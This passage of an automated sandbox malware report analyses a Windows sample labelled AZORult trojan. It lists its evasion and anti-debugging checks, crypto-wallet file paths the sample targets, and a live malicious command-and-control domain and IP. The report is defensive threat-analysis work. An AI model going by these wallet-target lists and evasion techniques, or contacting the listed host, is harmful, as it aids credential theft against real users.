              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: UoktqWamLR.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: UoktqWamLR.exeStatic file information: File size 1069056 > 1048576
              Source: UoktqWamLR.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x101000

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\UoktqWamLR.exeUnpacked PE file: 2.2.UoktqWamLR.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00417216
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_0040ACC2 pushfd ; retf 0_2_0040ACE5
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_0040ACFE pushfd ; retf 0_2_0040AD35
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_0040ACAC pushad ; retf 0_2_0040ACAD
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_00409B84 push esp; retf 0040h0_2_00409B8D
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_02352255 push esi; ret 0_2_02352261
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_02352EBA push edx; ret 0_2_02352EBC
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_02351B73 push ecx; iretd 0_2_02351B91
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_02354C26 push esi; iretd 0_2_02354C27
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0041A068 push 0041A08Eh; ret 2_2_0041A086
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0041A02C push 0041A05Ch; ret 2_2_0041A054
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040B164 push 0040B190h; ret 2_2_0040B188
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040B12C push 0040B158h; ret 2_2_0040B150
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040C136 push 0040C164h; ret 2_2_0040C15C
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040C138 push 0040C164h; ret 2_2_0040C15C
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040813C push 00408174h; ret 2_2_0040816C
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_004171E8 push 00417214h; ret 2_2_0041720C
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040E1A4 push 0040E1D0h; ret 2_2_0040E1C8
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040B1B8 push 0040B1E4h; ret 2_2_0040B1DC
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040E25A push 0040E288h; ret 2_2_0040E280
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040E25C push 0040E288h; ret 2_2_0040E280
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040D378 push 0040D3A8h; ret 2_2_0040D3A0
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040D37C push 0040D3A8h; ret 2_2_0040D3A0
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040B3D8 push 0040B414h; ret 2_2_0040B40C
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040B3DC push 0040B414h; ret 2_2_0040B40C
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_004183E4 push 00418410h; ret 2_2_00418408
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0040B420 push 0040B44Ch; ret 2_2_0040B444
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00415420 push 00415640h; ret 2_2_00415638
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00417424 push 00417450h; ret 2_2_00417448
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0041B488 push eax; retf 0041h2_2_0041B489
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00412504 push 00412530h; ret 2_2_00412528
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_004055C0 push 00405626h; ret 2_2_0040561E
              Source: UoktqWamLR.exeStatic PE information: section name: .text entropy: 7.8724464732051125
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00417216
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: UoktqWamLR.exeBinary or memory string: OLLYDBG.EXE
              Source: UoktqWamLR.exeBinary or memory string: X64DBG.EXE
              Source: UoktqWamLR.exeBinary or memory string: WINDBG.EXE
              Source: UoktqWamLR.exe, 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OLLYDBG.EXEX32DBG.EXEWINDBG.EXEX64DBG.EXEX96DBG.EXEIMMUNITYDEBUGGER.EXE_
              Source: C:\Users\user\Desktop\UoktqWamLR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00413030 FindFirstFileW,FindNextFileW,FindClose,2_2_00413030
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_0041160C FindFirstFileW,FindNextFileW,FindClose,2_2_0041160C
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,2_2_00413F58
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,2_2_004119A8
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_004119AC FindFirstFileW,FindNextFileW,FindClose,2_2_004119AC
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,2_2_00412D6C
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,2_2_00413F58
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00415E40 GetSystemInfo,2_2_00415E40
              Source: UoktqWamLR.exe, 00000002.00000002.2192999900.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW-
              Source: UoktqWamLR.exe, 00000002.00000002.2192999900.0000000000670000.00000004.00000020.00020000.00000000.sdmp, UoktqWamLR.exe, 00000002.00000002.2192999900.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\UoktqWamLR.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\UoktqWamLR.exeOpen window title or class name: windbgframeclass
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess queried: DebugFlagsJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00417216
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004BCC4B mov eax, dword ptr fs:[00000030h]0_2_004BCC4B
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004A746E mov eax, dword ptr fs:[00000030h]0_2_004A746E
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004A74CB mov eax, dword ptr fs:[00000030h]0_2_004A74CB
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004A74E0 mov eax, dword ptr fs:[00000030h]0_2_004A74E0
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004A74F4 mov eax, dword ptr fs:[00000030h]0_2_004A74F4
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004BCC84 mov eax, dword ptr fs:[00000030h]0_2_004BCC84
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004BCCBC mov eax, dword ptr fs:[00000030h]0_2_004BCCBC
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004BCD25 mov eax, dword ptr fs:[00000030h]0_2_004BCD25
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004BCD8F mov eax, dword ptr fs:[00000030h]0_2_004BCD8F
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004BCE4C mov eax, dword ptr fs:[00000030h]0_2_004BCE4C
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004BCB45 mov eax, dword ptr fs:[00000030h]0_2_004BCB45
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004A77C9 mov eax, dword ptr fs:[00000030h]0_2_004A77C9
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_004BCB9B mov eax, dword ptr fs:[00000030h]0_2_004BCB9B
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_02353113 mov eax, dword ptr fs:[00000030h]0_2_02353113
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_02355E3F mov eax, dword ptr fs:[00000030h]0_2_02355E3F
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_023536E4 mov eax, dword ptr fs:[00000030h]0_2_023536E4
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_02357735 mov eax, dword ptr fs:[00000030h]0_2_02357735
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_023577B7 mov eax, dword ptr fs:[00000030h]0_2_023577B7
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_023573F4 mov eax, dword ptr fs:[00000030h]0_2_023573F4
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_02356834 mov eax, dword ptr fs:[00000030h]0_2_02356834
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_02357827 mov eax, dword ptr fs:[00000030h]0_2_02357827
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_023578F3 mov eax, dword ptr fs:[00000030h]0_2_023578F3
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_02357D3D mov ecx, dword ptr fs:[00000030h]0_2_02357D3D
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_023501AE mov eax, dword ptr fs:[00000030h]0_2_023501AE
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_023575A8 mov eax, dword ptr fs:[00000030h]0_2_023575A8
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 0_2_023575E1 mov eax, dword ptr fs:[00000030h]0_2_023575E1
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00407AF0 mov eax, dword ptr fs:[00000030h]2_2_00407AF0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\UoktqWamLR.exeSection loaded: NULL target: C:\Users\user\Desktop\UoktqWamLR.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeProcess created: C:\Users\user\Desktop\UoktqWamLR.exe "C:\Users\user\Desktop\UoktqWamLR.exe"Jump to behavior
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: GetLocaleInfoA,2_2_00404BA8
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_004065F0 GetUserNameW,2_2_004065F0
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_00404C71 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,2_2_00404C71
              Source: C:\Users\user\Desktop\UoktqWamLR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: UoktqWamLR.exeBinary or memory string: ollyDbg.exe

              Stealing of Sensitive Information

              barindex
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_004186C42_2_004186C4
              Source: C:\Users\user\Desktop\UoktqWamLR.exeCode function: 2_2_004186C42_2_004186C4
              Source: Yara matchFile source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: UoktqWamLR.exe PID: 4952, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: UoktqWamLR.exe PID: 6164, type: MEMORYSTR
              Source: Yara matchFile source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: UoktqWamLR.exe PID: 4952, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: UoktqWamLR.exe PID: 6164, type: MEMORYSTR
              Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: electrum.dat
              Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
              Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
              Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
              Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
              Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
              Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Coins\Exodus
              Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Coins\Ethereum
              Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
              Source: UoktqWamLR.exe, 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              111
              Process Injection
              22
              Virtualization/Sandbox Evasion
              OS Credential Dumping331
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              111
              Process Injection
              LSASS Memory22
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information
              NTDS1
              Account Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets1
              System Owner/User Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync24
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              UoktqWamLR.exe63%ReversingLabsWin32.Trojan.AZORult
              UoktqWamLR.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://ehzwq.shop/erd/mac/index.phpa100%Avira URL Cloudmalware
              http://ip-api.com/j0%Avira URL Cloudsafe
              https://dotbit.me/a/0%Avira URL Cloudsafe
              https://ehzwq.shop/100%Avira URL Cloudmalware
              https://ehzwq.shop/erd/mac/index.php100%Avira URL Cloudmalware
              http://ip-api.com/json0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              ehzwq.shop
              45.77.249.79
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://ehzwq.shop/erd/mac/index.phptrue
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://ip-api.com/jUoktqWamLR.exe, 00000000.00000003.2146906626.0000000000752000.00000004.00000020.00020000.00000000.sdmp, UoktqWamLR.exe, 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://ehzwq.shop/erd/mac/index.phpaUoktqWamLR.exe, 00000002.00000002.2192999900.0000000000658000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                https://ehzwq.shop/UoktqWamLR.exe, 00000002.00000002.2192999900.0000000000698000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://ip-api.com/jsonUoktqWamLR.exe, UoktqWamLR.exe, 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://dotbit.me/a/UoktqWamLR.exe, UoktqWamLR.exe, 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                45.77.249.79
                ehzwq.shopUnited States
                20473AS-CHOOPAUStrue
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1504708
                Start date and time:2024-09-05 10:21:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 7s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:5
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:UoktqWamLR.exe
                renamed because original name is a hash value
                Original Sample Name:97CC0E7D7CAA3483E4C5E5CFF9FBE67E.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@3/0@2/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 42
                • Number of non-executed functions: 98
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
